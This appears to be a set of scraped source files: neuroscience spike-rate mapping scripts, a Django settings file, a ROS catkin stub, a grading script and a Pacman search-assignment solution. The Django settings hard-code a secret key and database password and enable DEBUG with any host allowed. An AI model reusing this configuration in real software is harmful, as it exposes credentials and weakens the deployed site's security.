    Builds the per-cluster dict with Division_clu_, then replaces each
    entry for clusters 1..n with the {'Luz': ..., 'Oscuridad': ...} dict
    produced by Division_luz_oscuridad (cluster 0 is left untouched).
    """
    num_clu = int(Cluster[0])
    principal = Division_clu_(Cluster, tiempo)
    for n in range(1, num_clu + 1):
        key = "Cluster Numero {}".format(n)
        principal[key] = Division_luz_oscuridad(principal[key], tiempo_l_o)
    return principal
def Cargar(name):
    """Unpickle and return the object stored in file *name*."""
    with open(name, "rb") as handle:
        return pickle.load(handle)
def Guardar(name,objecto):
    """Pickle *objecto* to file *name*."""
    with open(name, "wb") as handle:
        pickle.dump(objecto, handle)
"""Cálculo de tasa de disparo, etc."""
def Disparos(clu,time):
    """Map each spike time in *clu* to the index of its bin in *time*.

    Both arrays are assumed sorted ascending; the scan index only moves
    forward, so all spikes are located in a single pass. Returns an array
    of (float) indices into *time*.
    """
    indices = np.array([])
    j = 0
    for spike in clu:
        # Advance until the spike falls inside [time[j], time[j+1]).
        while not (time[j] <= spike < time[j + 1]):
            j += 1
        indices = np.insert(indices, indices.shape[0], j)
    return indices
def Cuentas(disp_clu,posx,posy,bins):
    """Count spikes per spatial bin.

    *disp_clu* holds position-sample indices (from Disparos); the animal's
    coordinates at those samples are binned into a (900/bins) x (900/bins)
    grid and a per-cell spike-count matrix is returned.
    """
    side = int(900 / bins)
    counts = np.zeros([side, side])
    xs = list(posx)
    ys = list(posy)
    for idx in disp_clu:
        sample = int(idx)
        counts[int(ys[sample] / bins)][int(xs[sample] / bins)] += 1
    return counts
def Tiempo(posx,posy,bins):
    """Accumulate occupancy (in raw 400-tick units) per spatial bin.

    Samples where both coordinates are -1 (tracking lost) are skipped.
    NOTE(review): the original trailing comment says the matrix should be
    divided by 20k to get seconds, but no division is applied here --
    confirm whether callers perform it.
    """
    xs = list(posx)
    ys = list(posy)
    side = int(900 / bins)
    occupancy = np.zeros([side, side])
    for i in range(posx.shape[0]):
        # `or`: a sample is only dropped when BOTH coordinates are -1.
        if ys[i] != -1 or xs[i] != -1:
            occupancy[int(ys[i] / bins)][int(xs[i] / bins)] += 400
    return occupancy
def Tiempo_2(Dicc,bins,type_fuente):
    """Occupancy time (seconds) per spatial bin, restricted to the trials
    whose light-source label equals *type_fuente*.

    *Dicc* must contain "Light_Trials" (rows of label, start, end in ticks)
    and "Posicion" (positions sampled every 400 ticks). The arena is binned
    into a (900/bins) x (900/bins) grid.
    """
    Tasa_disparo=np.zeros([int(900/bins),int(900/bins)])
    # NOTE(review): the hard-coded 60 assumes exactly 60 trials -- confirm.
    for i in range(60):
        if Dicc["Light_Trials"][i][1]==type_fuente:
            # Slice the position samples covered by this trial; tick times are
            # converted to sample indices by dividing by the 400-tick period.
            X=list(Dicc["Posicion"].T[0][int(int(Dicc["Light_Trials"][i][2])/400):int(int(Dicc["Light_Trials"][i][3])/400)+1])
            Y=list(Dicc["Posicion"].T[1][int(int(Dicc["Light_Trials"][i][2])/400):int(int(Dicc["Light_Trials"][i][3])/400)+1])
            # Inner loop reuses the name i; in Python the outer range loop is
            # unaffected because it reassigns i from its own iterator.
            for i in range(len(X)):
                if (Y[i]!=-1 or X[i]!=-1): # skip samples where tracking was lost
                    Tasa_disparo[int(Y[i]/bins)][int(X[i]/bins)]+=400
    return Tasa_disparo/20000 #Se divide por 20k para obtener la matriz expresada en segundos
def Tasa_disparo(cuenta,tiempo):
    """Element-wise firing rate: spike counts divided by occupancy time.

    Cells with zero occupancy are left at rate 0 to avoid division by zero.

    Bug fix: the original iterated BOTH axes with cuenta.shape[0], which
    silently ignored columns beyond the row count for non-square inputs;
    the inner loop now uses shape[1].
    """
    tasa_verdadera = np.zeros(cuenta.shape)
    for i in range(cuenta.shape[0]):
        for j in range(cuenta.shape[1]):
            if tiempo[i][j] != 0:
                tasa_verdadera[i][j] = cuenta[i][j] / tiempo[i][j]
    return tasa_verdadera
def Cluster_type_light_(Diccionario,bins,luz_oscuridad,type_fuente,num_clu,Eje_Temporal):
    """Plot the Gaussian-smoothed firing-rate map of one cluster for one
    light condition.

    *luz_oscuridad* selects "Luz" or "Oscuridad"; *type_fuente* is the
    light-source label (e.g. "l2") whose trials are pooled together.
    """
    Disparos_clu=np.array([])
    fuente="{}{}".format(str(type_fuente),".{}")
    # Concatenate the spike times of every trial that used this light source.
    # NOTE(review): the hard-coded 30 caps the number of trials scanned.
    for i in range(30):
        if fuente.format(i) in Diccionario["Cluster Numero {}".format(str(num_clu))][luz_oscuridad]:
            Disparos_clu=np.concatenate((Disparos_clu,Diccionario["Cluster Numero {}".format(str(num_clu))][luz_oscuridad][fuente.format(i)]))
    Shots_clu=Disparos(Disparos_clu, Eje_Temporal) # map spikes to position-sample indices
    Cuenta=Cuentas(Shots_clu,Diccionario["Posicion"].T[0], Diccionario["Posicion"].T[1], bins)
    Time=Tiempo_2(Diccionario, bins,type_fuente) # occupancy per spatial bin
    Tasa_de_disparo=Tasa_disparo(Cuenta, Time)
    Imagen_Filtrada=gauss_fil(Tasa_de_disparo, 3) # sigma=3 Gaussian smoothing
    plt.imshow(Imagen_Filtrada,cmap="jet")
    # plt.imshow(Tasa_de_disparo,cmap="jet")
def Generador_Dicc(Datos_brutos):
    """Build and pickle one per-session data dictionary for every animal
    code in *Datos_brutos*.

    For each animal this lists the recording-session folders, loads the
    .clu (cluster ids), .res (spike times) and .light_trials_intervals
    files, refines them with Division_global, attaches the position (.whl)
    data and the trial table, and saves the result with Guardar.
    """
    for k in Datos_brutos:
        datos={}
        Nombre_animales="/home/tomasg/Escritorio/Neuro/data_perez_escobar_2016/circular_arena/{}" # animal folder template
        List_ses=listdir(Nombre_animales.format(k))
        Sessiones=[] # list of session date codes
        for i in List_ses:
            # The session code sits between the first "-" and "2015".
            Ses=i[i.find("-")+1:i.find("2015")]
            Sessiones.append(Ses)
        Nombre2="/home/tomasg/Escritorio/Neuro/data_perez_escobar_2016/circular_arena/{}/{}-{}2015-0108/{}-{}2015-0108.{}"
        Nombre1="{}-{}2015-0108".format(k,"{}")
        Nombre_clu=Nombre2.format(k,k,"{}",k,"{}","clu")
        Nombre_res=Nombre2.format(k,k,"{}",k,"{}","res")
        Nombre_light=Nombre2.format(k,k,"{}",k,"{}","light_trials_intervals")
        Nombre_whl=Nombre2.format(k,k,"{}",k,"{}","whl")
        # Load the raw per-session files.
        for i in Sessiones:
            datos[Nombre1.format(i)]={"Clu":np.loadtxt(Nombre_clu.format(i,i)),"Res":np.loadtxt(Nombre_res.format(i,i)),"Light":np.loadtxt(Nombre_light.format(i,i),dtype=str)}
        """Cargo los archivos"""
        # Destination template for the refined, pickled dictionaries.
        Nombre_Guardar="/home/tomasg/Escritorio/Neuro/Lectura de Datos/Generacion de Dicc_Clu/Diccionarios_Datos/{}/Diccionario_{}"
        """Refino y guardo los datos"""
        Dic={}
        for l in Sessiones:
            Dic=Division_global(datos[Nombre1.format(l)]["Clu"], datos[Nombre1.format(l)]["Res"], datos[Nombre1.format(l)]["Light"])
            Dic["Posicion"]=np.loadtxt(Nombre_whl.format(l,l)) # position samples
            Dic["Light_Trials"]=datos[Nombre1.format(l,l)]["Light"] # light/dark trial intervals
            Guardar(Nombre_Guardar.format(k,l),Dic) # l is the session, k the animal code
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""Genero los diccionarios principales"""""""""""""""""""""""""""""""""""""""""""""""""""""""""
Animal=['jp2142', 'jp21414']
Generador_Dicc(Animal)

Nombre1="jp19844-{}2015-0108" # base name pattern for this animal's sessions
jp19844={}
Sessiones=["0908","1108","1208","1308","2008","2608"] # recording-session dates
Nombre_clu="/home/tomasg/Escritorio/Neuro/Lectura de Datos/Generacion de Dicc_Clu/{}.clu".format(Nombre1)
Nombre_res="/home/tomasg/Escritorio/Neuro/Lectura de Datos/Generacion de Dicc_Clu/{}.res".format(Nombre1)
Nombre_light="/home/tomasg/Escritorio/Neuro/Lectura de Datos/Generacion de Dicc_Clu/{}.light_trials_intervals".format(Nombre1)
Nombre_whl="/home/tomasg/Escritorio/Neuro/Lectura de Datos/Generacion de Dicc_Clu/{}.whl".format(Nombre1)
# Load the raw .clu/.res/light-trial files for every session of jp19844.
for i in Sessiones:
    jp19844[Nombre1.format(i)]={"Clu":np.loadtxt(Nombre_clu.format(str(i))),"Res":np.loadtxt(Nombre_res.format(str(i))),"Light":np.loadtxt(Nombre_light.format(str(i)),dtype=str)}
"""Cargo los archivos"""
# Destination template for the refined, pickled dictionaries.
Nombre_Guardar="/home/tomasg/Escritorio/Neuro/Lectura de Datos/Generacion de Dicc_Clu/Diccionarios_Datos/jp19844/Diccionario_{}"
"""Refino y guardo los datos"""
Dic={}
for l in Sessiones:
    Dic=Division_global(jp19844[Nombre1.format(l)]["Clu"], jp19844[Nombre1.format(l)]["Res"], jp19844[Nombre1.format(l)]["Light"])
    Dic["Posicion"]=np.loadtxt(Nombre_whl.format(l)) # add the position samples
    Dic["Light_Trials"]=jp19844[Nombre1.format(l)]["Light"] # add the light/dark trial intervals
    Guardar(Nombre_Guardar.format(l),Dic)
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""Calculo de tasa de disparo"""""""""""""""""""""""""""""""""""""""""""""""""""""""""
"""En esta parte del codigo determino la tasa de disparo de la siguiente manera:
1) Determino una matriz con los disparos para UN cluster
la matriz es una representacion cuadricular del espacio. Cada elemento de la matriz representa una porcion del espacio físico por donde el animal se mueve
2) Determino una matriz del mismo tamaño con el tiempo que estuvo el animal en dicho lugar físico
3) Determino, con una division elemento a elemento, la tasa de disparo del animal en dicho lugar
4) A la matriz resultante Tasa_de_disparo le aplico un filtro gaussiano para suavizar la imagen
5) Grafico el resultado """
#Antes que nada se cargan los elementos a aplicar el proceso antes descripto
# =============================================================================
# Modo MANUAL, modo de ejemplo solicitado por Sub. Dir
# =============================================================================
Name="jp5519"
Datos_Animal="{}/Diccionario_{}".format(Name,"0610")
Nombre_Carga="/home/tomasg/Escritorio/Neuro/Lectura de Datos/Generacion de Dicc_Clu/Diccionarios_Datos/{}".format(Datos_Animal)
Diccionario=Cargar(Nombre_Carga) # load the previously generated dictionary
"""CONCATENO LOS INTERVALOS EN LOS QUE SE UTILIZO LA MISMA LUZ l2 O l4"""
Disparos_clu=np.array([])
# Pool the spike times of cluster 6 across all l2 light trials.
# NOTE(review): KeyError if fewer than 30 "l2.N" entries exist -- the guard
# below was commented out; confirm intended behaviour.
for i in range(30):
    #if fuente.format(i) in Diccionario["Cluster Numero {}".format(str(num_clu))][luz_oscuridad]:
    Disparos_clu=np.concatenate((Disparos_clu,Diccionario["Cluster Numero 6"]["Luz"]["l2.{}".format(i)]))
"""PROCESO LOS DATOS PARA LA MISMA LUZ l2 O l4"""
Shots_clu=Disparos(Disparos_clu, Eje_Temporal) # map spikes to sample indices
Cuenta=Cuentas(Shots_clu,Diccionario["Posicion"].T[0], Diccionario["Posicion"].T[1], 25.0001)
# NOTE(review): Tiempo_2 expects (Dicc, bins, type_fuente); this call passes
# two position arrays plus a bin size, which matches the Tiempo() signature
# instead and will misbehave -- confirm which function was intended.
Time=Tiempo_2(Diccionario["Posicion"].T[0], Diccionario["Posicion"].T[1], 25.0001) #Tiempo del individuo en una determinada posicion
Tasa_de_disparo=Tasa_disparo(Cuenta, Time)
Imagen_Filtrada=gauss_fil(Tasa_de_disparo, 1) # sigma=1 Gaussian smoothing
plt.imshow(Imagen_Filtrada,cmap="jet")
plt.imshow(Tasa_de_disparo,cmap="jet")
#plt.imshow(Tasa_de_disparo,cmap="jet",vmin=0,vmax=1)
#plt.imshow(Imagen_Filtrada,cmap="jet",vmin=0,vmax=1)
|
[
"noreply@github.com"
] |
noreply@github.com
|
758db4b99719e367115109a9db0ff573624e2909
|
928e46c6f6553fe285645c3a61fb8b6ec1c27020
|
/website/website/settings.py
|
ff58740173b0a59efcb0ff5e9dbd86e52d7ae605
|
[] |
no_license
|
aureatemandala/The-Pavilion-of-Dreams
|
06ab1be2490639cd6f16022e8d76e449f290632f
|
7e3dcbabfc304500750273fb5cca5392d1416158
|
refs/heads/master
| 2022-12-31T10:41:36.345352
| 2020-10-25T13:51:38
| 2020-10-25T13:51:38
| 272,225,840
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,460
|
py
|
"""
Django settings for website project.
Generated by 'django-admin startproject' using Django 3.0.8.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os

# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))

# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): hard-coded secret key checked into source -- should be
# loaded from the environment before any production deployment.
SECRET_KEY = 'hws4725ktt-!ad#or+tw!h9jk0*gf9u45#07qb_id_56!@9lmy'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

# NOTE(review): '*' accepts any Host header -- tighten for production.
ALLOWED_HOSTS = ['*']

# Application definition

INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'dreams',
    'ckeditor',
    'ckeditor_uploader',
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'website.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [os.path.join(BASE_DIR, 'templates').replace('\\','/')],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'website.wsgi.application'

# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
# NOTE(review): plaintext credentials in source -- move to environment vars.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.mysql',
        'NAME': 'djdb',
        'USER': 'nimrod',
        'PASSWORD': '123456',
        'HOST': '127.0.0.1',
        'PORT': '3306'
    }
}

# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators

AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]

# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/

LANGUAGE_CODE = 'zh-hans'

TIME_ZONE = 'Asia/Shanghai'

USE_I18N = True

USE_L10N = True

USE_TZ = True

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/

STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR,'static')

# media
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')

# ckeditor configuration: upload directory (relative to MEDIA_ROOT)
CKEDITOR_UPLOAD_PATH = 'upload/'
|
[
"original_sin@163.com"
] |
original_sin@163.com
|
950cf5404ea2b75c9cadf94aa12dfbb274256e43
|
70ad3badf3fa6e2edf1889d8640f25a7ec0d9db1
|
/ros_catkin_ws/devel_isolated/rosparam/lib/python2.7/dist-packages/rosparam/__init__.py
|
979cdadf5761c2736f68558fa36dbd74e4175656
|
[] |
no_license
|
MathieuHwei/OldGaitMaven
|
758a937dfda2cf4f1aee266dbbf682ef34989199
|
873f7d9089c5d1c0772bd3447e2b0a31dac68b70
|
refs/heads/main
| 2023-06-17T18:40:06.230823
| 2021-07-19T23:08:20
| 2021-07-19T23:08:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,030
|
py
|
# -*- coding: utf-8 -*-
# generated from catkin/cmake/template/__init__.py.in
# keep symbol table as clean as possible by deleting all unnecessary symbols
# NOTE: this file is auto-generated by catkin; it extends the package path
# with the devel-space source directory and exec()s the real package
# __init__ files found there. Do not hand-edit the logic.
from os import path as os_path
from sys import path as sys_path
from pkgutil import extend_path
__extended_path = "/home/pi/ros_catkin_ws/src/ros_comm/rosparam/src".split(";")
# Prepend the source directories so they win over the devel space.
for p in reversed(__extended_path):
    sys_path.insert(0, p)
    del p
del sys_path
__path__ = extend_path(__path__, __name__)
del extend_path
__execfiles = []
# Collect the real package __init__ (either <name>.py or <name>/__init__.py).
for p in __extended_path:
    src_init_file = os_path.join(p, __name__ + '.py')
    if os_path.isfile(src_init_file):
        __execfiles.append(src_init_file)
    else:
        src_init_file = os_path.join(p, __name__, '__init__.py')
        if os_path.isfile(src_init_file):
            __execfiles.append(src_init_file)
    del src_init_file
    del p
del os_path
del __extended_path
# Execute the collected init files in this module's namespace.
for __execfile in __execfiles:
    with open(__execfile, 'r') as __fh:
        exec(__fh.read())
    del __fh
del __execfile
del __execfiles
|
[
"giahuy050201@gmail.com"
] |
giahuy050201@gmail.com
|
72522674426e18924bfd748a8caddecc1218f247
|
3282960df3031dfdf48dc7f3ac0433faff84b4f6
|
/Lista02/Ex005.py
|
0b0299ad9dd8756ccbcffe5b2f9f7991d2af5adb
|
[] |
no_license
|
fillipe-felix/ExerciciosPython
|
603120ea05dfcd627ae970f090df5f8072228706
|
119badd286c525397b56d514f8430c93a5eb2c4d
|
refs/heads/master
| 2020-03-23T02:48:26.656961
| 2018-07-15T18:19:08
| 2018-07-15T18:19:08
| 140,993,223
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 646
|
py
|
"""Read two partial grades, average them and print the verdict:
"Aprovado com Distinção" when the average is exactly ten, "Aprovado"
for seven or above, "Reprovado" below seven.
"""
nota1 = float(input("Digite a primeira nota: "))
nota2 = float(input("Digite a segunda nota: "))

media = (nota1 + nota2) / 2

if media == 10:
    print("o aluno foi APROVADO COM DISTINÇÂO")
elif media >= 7:
    print("O aluno foi APROVADO")
elif media < 7:
    print("O aluno foi REPROVADO")
|
[
"felipesoares_1993@hotmail.com"
] |
felipesoares_1993@hotmail.com
|
c7f7d55da80fa96f610e72e41a113d2b31b4f2a4
|
cb6ea8cffe592d5ecbae3581c15143836d9714fd
|
/1. Search/search/searchAgents.py
|
efaa50237bafa0577d76b28568a39f67d1a9410b
|
[] |
no_license
|
pswaroopk/pacman-ai
|
a51d421f6b4ebe1f2f55830a0ef2a1c1f6ae8607
|
64b971d82db73780c5e6c9561666ba86f8ff314a
|
refs/heads/master
| 2020-06-27T22:34:02.231705
| 2017-07-13T03:23:10
| 2017-07-13T03:23:10
| 97,074,410
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 25,146
|
py
|
# searchAgents.py
# ---------------
# Licensing Information: You are free to use or extend these projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.
#
# Attribution Information: The Pacman AI projects were developed at UC Berkeley.
# The core projects and autograders were primarily created by John DeNero
# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).
# Student side autograding was added by Brad Miller, Nick Hay, and
# Pieter Abbeel (pabbeel@cs.berkeley.edu).
"""
This file contains all of the agents that can be selected to control Pacman. To
select an agent, use the '-p' option when running pacman.py. Arguments can be
passed to your agent using '-a'. For example, to load a SearchAgent that uses
depth first search (dfs), run the following command:
> python pacman.py -p SearchAgent -a fn=depthFirstSearch
Commands to invoke other search strategies can be found in the project
description.
Please only change the parts of the file you are asked to. Look for the lines
that say
"*** YOUR CODE HERE ***"
The parts you fill in start about 3/4 of the way down. Follow the project
description for details.
Good luck and happy searching!
"""
from game import Directions
from game import Agent
from game import Actions
import util
import time
import search
class GoWestAgent(Agent):
    "An agent that goes West until it can't."

    def getAction(self, state):
        """Return WEST while it is a legal move, otherwise STOP.

        *state* is a GameState (defined in pacman.py).
        """
        legal = state.getLegalPacmanActions()
        return Directions.WEST if Directions.WEST in legal else Directions.STOP
#######################################################
# This portion is written for you, but will only work #
# after you fill in parts of search.py #
#######################################################
class SearchAgent(Agent):
    """
    This very general search agent finds a path using a supplied search
    algorithm for a supplied search problem, then returns actions to follow
    that path.

    As a default, this agent runs DFS on a PositionSearchProblem to find
    location (1,1).

    Options for fn include:
      depthFirstSearch or dfs
      breadthFirstSearch or bfs
    """

    def __init__(self, fn='depthFirstSearch', prob='PositionSearchProblem', heuristic='nullHeuristic'):
        # Resolve the search function by name from search.py.
        if fn not in dir(search):
            raise AttributeError(fn + ' is not a search function in search.py.')
        func = getattr(search, fn)
        # ``__code__`` works on Python 2.6+ and Python 3; ``func_code`` was
        # Python-2-only.
        if 'heuristic' not in func.__code__.co_varnames:
            print('[SearchAgent] using function ' + fn)
            self.searchFunction = func
        else:
            # Resolve the heuristic by name: this module first, then search.py.
            if heuristic in globals().keys():
                heur = globals()[heuristic]
            elif heuristic in dir(search):
                heur = getattr(search, heuristic)
            else:
                raise AttributeError(heuristic + ' is not a function in searchAgents.py or search.py.')
            print('[SearchAgent] using function %s and heuristic %s' % (fn, heuristic))
            # Bind the heuristic into the search function.
            self.searchFunction = lambda x: func(x, heuristic=heur)

        # Resolve the search problem type by name from this module.
        if prob not in globals().keys() or not prob.endswith('Problem'):
            raise AttributeError(prob + ' is not a search problem type in SearchAgents.py.')
        self.searchType = globals()[prob]
        print('[SearchAgent] using problem type ' + prob)

    def registerInitialState(self, state):
        """
        Compute and store the whole action path the first time the agent sees
        the board layout.  All of the work happens here.

        state: a GameState object (pacman.py)
        """
        if self.searchFunction is None:
            raise Exception("No search function provided for SearchAgent")
        starttime = time.time()
        problem = self.searchType(state)  # Makes a new search problem
        self.actions = self.searchFunction(problem)  # Find a path
        totalCost = problem.getCostOfActions(self.actions)
        print('Path found with total cost of %d in %.1f seconds' % (totalCost, time.time() - starttime))
        if '_expanded' in dir(problem):
            print('Search nodes expanded: %d' % problem._expanded)

    def getAction(self, state):
        """
        Return the next action of the precomputed path, or Directions.STOP
        once the path is exhausted.

        state: a GameState object (pacman.py)
        """
        if not hasattr(self, 'actionIndex'):
            self.actionIndex = 0
        i = self.actionIndex
        self.actionIndex += 1
        if i < len(self.actions):
            return self.actions[i]
        return Directions.STOP
class PositionSearchProblem(search.SearchProblem):
    """
    A search problem for finding paths to a particular point on the board.

    The state space consists of (x, y) positions in a pacman game.
    """

    def __init__(self, gameState, costFn=lambda x: 1, goal=(1, 1), start=None, warn=True, visualize=True):
        """
        Stores the start and goal.

        gameState: A GameState object (pacman.py)
        costFn: A function from a search state (tuple) to a non-negative number
        goal: A position in the gameState
        """
        self.walls = gameState.getWalls()
        self.startState = gameState.getPacmanPosition()
        if start is not None:  # identity test instead of '!= None'
            self.startState = start
        self.goal = goal
        self.costFn = costFn
        self.visualize = visualize
        if warn and (gameState.getNumFood() != 1 or not gameState.hasFood(*goal)):
            print('Warning: this does not look like a regular search maze')

        # For display purposes
        self._visited, self._visitedlist, self._expanded = {}, [], 0  # DO NOT CHANGE

    def getStartState(self):
        return self.startState

    def isGoalState(self, state):
        isGoal = state == self.goal

        # For display purposes only
        if isGoal and self.visualize:
            self._visitedlist.append(state)
            import __main__
            if '_display' in dir(__main__):
                if 'drawExpandedCells' in dir(__main__._display):
                    __main__._display.drawExpandedCells(self._visitedlist)
        return isGoal

    def getSuccessors(self, state):
        """
        Returns successor states, the actions they require, and a cost.

        For a given state this returns a list of triples (successor, action,
        stepCost): a neighbouring open square, the move that reaches it, and
        costFn applied to that square.
        """
        successors = []
        for action in [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]:
            x, y = state
            dx, dy = Actions.directionToVector(action)
            nextx, nexty = int(x + dx), int(y + dy)
            if not self.walls[nextx][nexty]:
                nextState = (nextx, nexty)
                cost = self.costFn(nextState)
                successors.append((nextState, action, cost))

        # Bookkeeping for display purposes
        self._expanded += 1  # DO NOT CHANGE
        if state not in self._visited:
            self._visited[state] = True
            self._visitedlist.append(state)

        return successors

    def getCostOfActions(self, actions):
        """
        Returns the cost of a particular sequence of actions. If those actions
        include an illegal move, return 999999.
        """
        if actions is None:  # identity test instead of '== None'
            return 999999
        x, y = self.getStartState()
        cost = 0
        for action in actions:
            # Figure out the next state and check whether it is legal.
            dx, dy = Actions.directionToVector(action)
            x, y = int(x + dx), int(y + dy)
            if self.walls[x][y]:
                return 999999
            cost += self.costFn((x, y))
        return cost
class StayEastSearchAgent(SearchAgent):
    """
    Position-search agent whose cost function penalizes the West side of the
    board: stepping into position (x, y) costs (1/2)**x, so cheaper paths
    stay East.
    """

    def __init__(self):
        self.searchFunction = search.uniformCostSearch
        penalizeWest = lambda pos: .5 ** pos[0]
        self.searchType = lambda state: PositionSearchProblem(state, penalizeWest, (1, 1), None, False)
class StayWestSearchAgent(SearchAgent):
    """
    Position-search agent whose cost function penalizes the East side of the
    board: stepping into position (x, y) costs 2**x, so cheaper paths stay
    West.
    """

    def __init__(self):
        self.searchFunction = search.uniformCostSearch
        penalizeEast = lambda pos: 2 ** pos[0]
        self.searchType = lambda state: PositionSearchProblem(state, penalizeEast)
def manhattanHeuristic(position, problem, info={}):
    """Return the Manhattan (L1) distance from position to problem.goal."""
    (x1, y1), (x2, y2) = position, problem.goal
    return abs(x1 - x2) + abs(y1 - y2)
def euclideanHeuristic(position, problem, info={}):
    """Return the straight-line (L2) distance from position to problem.goal."""
    dx = position[0] - problem.goal[0]
    dy = position[1] - problem.goal[1]
    return (dx ** 2 + dy ** 2) ** 0.5
#####################################################
# This portion is incomplete. Time to write code! #
#####################################################
#import pdb; pdb.set_trace()
class CornersProblem(search.SearchProblem):
    """
    This search problem finds paths through all four corners of a layout.

    A search state is a pair (position, visited) where ``position`` is
    Pacman's (x, y) location and ``visited`` is a list of four booleans, one
    per corner in ``self.corners`` order, marking corners reached so far.
    Start: (startingPosition, [False]*4); goal: any state whose four flags
    are all True.
    """

    def __init__(self, startingGameState, costFn=lambda x: 1, start=None, visualize=True):
        """Store the walls, Pacman's starting position and the corners."""
        self.gameState = startingGameState
        self.walls = startingGameState.getWalls()
        self.startingPosition = startingGameState.getPacmanPosition()
        top, right = self.walls.height - 2, self.walls.width - 2
        self.corners = ((1, 1), (1, top), (right, 1), (right, top))
        for corner in self.corners:
            if not startingGameState.hasFood(*corner):
                print('Warning: no food in corner ' + str(corner))
        self._expanded = 0  # DO NOT CHANGE; Number of search nodes expanded
        self.costFn = costFn
        self.visualize = visualize
        # For display purposes
        self._visited, self._visitedlist, self._expanded = {}, [], 0  # DO NOT CHANGE

    def updateGoalState(self, state):
        """Point self.goal at the corner closest (Manhattan) to ``state``."""
        distance = 999999
        goal = self.goal
        for corner in self.corners:
            currDist = util.manhattanDistance(state, corner)
            if distance > currDist:
                # Bug fix: remember the best distance found so far; the
                # original never updated ``distance`` and therefore ended on
                # the last corner rather than the nearest one.
                distance = currDist
                goal = corner
        self.goal = goal

    def getStartState(self):
        """Return the start state: starting position, no corners visited."""
        return (self.startingPosition, [False, False, False, False])

    def isGoalState(self, state):
        """A state is a goal once all four corner flags are True."""
        isGoal = state[1][0] and state[1][1] and state[1][2] and state[1][3]

        # For display purposes only
        if isGoal and self.visualize:
            self._visitedlist.append(state[0])
            import __main__
            if '_display' in dir(__main__):
                if 'drawExpandedCells' in dir(__main__._display):
                    __main__._display.drawExpandedCells(self._visitedlist)
        return isGoal

    def getSuccessors(self, state):
        """
        Return (successor, action, stepCost) triples.  A successor carries a
        fresh visited list: a corner flag becomes True when the next
        position is that corner, or stays True if it already was.
        """
        successors = []
        for action in [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]:
            x, y = state[0]
            dx, dy = Actions.directionToVector(action)
            nextx, nexty = int(x + dx), int(y + dy)
            if not self.walls[nextx][nexty]:
                nextState = (nextx, nexty)
                corners = [False, False, False, False]
                for i, corner in enumerate(self.corners):
                    corners[i] = nextState == corner or state[1][i]
                cost = self.costFn(nextState)
                successors.append(((nextState, corners), action, cost))

        # Bookkeeping for display purposes
        self._expanded += 1  # DO NOT CHANGE
        if state[0] not in self._visited:
            self._visited[state[0]] = True
            self._visitedlist.append(state[0])
        return successors

    def getCostOfActions(self, actions):
        """
        Return the number of actions, or 999999 if ``actions`` is None or
        any move walks into a wall.
        """
        if actions is None:
            return 999999
        x, y = self.startingPosition
        for action in actions:
            dx, dy = Actions.directionToVector(action)
            x, y = int(x + dx), int(y + dy)
            if self.walls[x][y]:
                return 999999
        return len(actions)
def cornersHeuristic(state, problem):
    """
    Heuristic for CornersProblem: greedily hop to the nearest unvisited
    corner (Manhattan distance), repeating until every corner is covered,
    and return the summed hop lengths as a lower bound on the remaining
    path cost.
    """
    corners = problem.corners  # corner coordinates from the problem

    if problem.isGoalState(state):
        return 0

    position, flags = state
    remaining = [i for i, seen in enumerate(flags) if not seen]
    total = 0
    while remaining:
        # Pick the closest still-unvisited corner; ties resolve to the
        # lowest corner index, matching the original list-order min().
        best_index, best_dist = min(
            ((i, util.manhattanDistance(position, corners[i])) for i in remaining),
            key=lambda pair: pair[1])
        position = corners[best_index]
        remaining.remove(best_index)
        total += best_dist
    return total
class AStarCornersAgent(SearchAgent):
    """A SearchAgent running A* with cornersHeuristic on CornersProblem."""

